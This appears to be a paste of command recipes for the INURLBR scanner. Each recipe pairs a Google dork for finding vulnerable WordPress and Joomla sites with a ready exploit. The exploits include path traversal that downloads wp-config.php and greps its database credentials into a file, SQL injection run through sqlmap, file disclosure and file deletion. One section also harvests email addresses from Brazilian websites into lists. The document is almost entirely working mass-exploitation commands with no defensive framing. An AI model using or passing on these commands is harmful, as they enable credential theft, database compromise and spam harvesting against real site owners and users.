Googleinurl

EXAMPLES CONTROLS INURLBR

Jan 1st, 2015
[!] CONTROL SERIES
# AUTHOR: Cleiton Pinheiro / NICK: GoogleINURL
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# GIT: https://github.com/googleinurl
# YOUTUBE: https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# PACKETSTORMSECURITY: http://packetstormsecurity.com/user/googleinurl/

[!]::COMMANDS USED IN THE SCANNER INURLBR | https://github.com/googleinurl/SCANNER-INURLBR
----------------------------------------------------------------------------------------------------

[+] Arbitrary File Download
./inurlbr.php --dork '"canetas" "/revslider/"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-vul 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }

./inurlbr.php --dork '"inurl:/themes/urban/" "www"' -q 1,6 -s wordpress2.txt --exploit-get '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' -t 3 --exploit-comand '/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"' }

EXPLOIT:
http://pastebin.com/ZEnbxXXd
OR
http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
----------------------------------------------------------------------------------------------------

[+] FILTER AND MAIL
./inurlbr.php --dork 'site:.br @ gmail|hotmail|terra|uol ext:txt' -q all -s MEGA.txt -m

cat Lista.txt | egrep '@bol.com.br|@terra.com.br' |cut -d \; -f 1 | sort -u >> bolterra.txt

cat Lista.txt | egrep '@zipmail.com.br' |cut -d \; -f 1 | sort -u >> ZIPMAIL.txt

./inurlbr.php --dork='site:.br intext:gmail || intext:hotmail ext:txt -hdutl -upnet -static' --arquivo='TOPGMAIL.txt'
----------------------------------------------------------------------------------------------------

[+] EXPLOIT COMPONENT JOOMLA
./inurlbr.php --dork '"com_spidercalendar" +"noticias"' -s spider.txt -q 1,6 -t 3 --exploit-get "/index.php?option=com_spidercalendar&calendar_id=1'027" --comand-vul "python spyder.py -H http://_TARGET_/"

EXPLOIT:
http://www.exploit-db.com/exploits/20983/
----------------------------------------------------------------------------------------------------

[+] EGYWEB (Mantrac) <= Remote File Disclosure Exploit
./inurlbr.php --dork '"Created by EGYWEB"' -s rcdz.txt -q 1,6 -t 3 --exploit-get "/360download.php?file_name=classes/db_connector.php" --comand-vul "python rcd.py http://_TARGET_/"

EXPLOIT:
http://1337day.com/exploit/22643
----------------------------------------------------------------------------------------------------

[+] Joomla Spider Form Maker <= 3.4 - SQLInjection
./inurlbr.php --dork '"com_formmaker" +"contato"' -q 1,6 -s com_formmaker.txt -t 3 --exploit-get '/index.php?option=com_formmaker&view=formmaker&id=-1+AND+(SELECT+User+from+mysql.user+limit+0,1)' -a 'mysql.user' --comand-vul "python sqlmap.py -u '_TARGET_/index.php?option=com_formmaker&view=formmaker&id=1' -p id --batch --random-agent --dbs"

EXPLOIT:
http://www.exploit-db.com/exploits/34637/
----------------------------------------------------------------------------------------------------

[+] Wordpress Theme Strange File Upload / File Deletion
./inurlbr.php --dork '"movie" "/wp-content/themes/ut-strange/"' -s del.txt -q 1,6 -t 3 --exploit-get "/wp-content/themes/ut-strange/addpress/includes/ap_fileupload.php" --comand-all "php delete.php http://_TARGET_/ wp.php"

EXPLOIT:
http://de.1337day.com/exploit/22674
----------------------------------------------------------------------------------------------------